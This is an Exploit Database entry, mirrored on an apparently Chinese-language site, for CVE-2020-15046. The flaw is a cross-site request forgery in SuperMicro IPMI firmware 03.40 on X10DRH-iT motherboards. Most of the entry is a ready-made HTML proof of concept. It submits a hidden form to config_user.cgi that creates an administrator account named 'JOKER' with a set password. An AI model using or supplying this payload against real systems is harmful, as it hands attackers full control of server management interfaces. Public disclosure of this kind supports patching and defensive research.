SuperMicro IPMI 03.40 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 12 阅读

• 作者： Metin Yunus Kandemir
  日期： 2020-07-08
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48652/

• # Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
  # Exploit Author: Metin Yunus Kandemir
  # Vendor Homepage: https://www.supermicro.com/
  # Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
  # Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
  # CVE: CVE-2020-15046
  # Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
  
  # Description:
  # The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
  # IPMI firmware 03.40
  # allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to
  add new admin users.
  # The fixed versions are BIOS 3.2 and firmware 03.88.
  
  # PoC :
  
  <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
  <input type="hidden" name="username" value="JOKER" />
  <input type="hidden" name="original&#95;username" value="2" />
  <input type="hidden" name="password" value="onebadday" />
  <input type="hidden" name="new&#95;privilege" value="4" />
  <input type="submit" value="submit request" />
  </form>
  </body>
  </html>